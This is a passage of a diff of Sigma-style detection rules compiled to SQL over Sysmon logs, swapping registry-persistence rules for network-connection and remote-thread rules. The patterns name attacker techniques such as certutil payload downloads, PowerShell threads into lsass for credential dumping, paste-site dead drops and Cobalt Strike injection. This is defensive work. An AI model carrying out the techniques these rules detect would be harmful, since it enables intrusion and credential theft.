Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section 
for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR 
DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE 
'%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network 
provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate use of wuauclt.exe over the network." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR 
DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image 
LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "status": "test", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate msiexec over networks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "ETW Logging Disabled For SCM", - "id": 
"4f281b83-0200-4b34-bf35-d24687ea57c2", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", "status": "experimental", - "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + "Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 
'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_services_etw_tamper.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a script interpreter wscript/cscript opening a network connection. 
Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects a 
possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_terminal_server_suspicious.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Wow6432Node Classes Autorun Keys Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "status": "experimental", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate software automatically (mostly, during 
installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": 
"fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
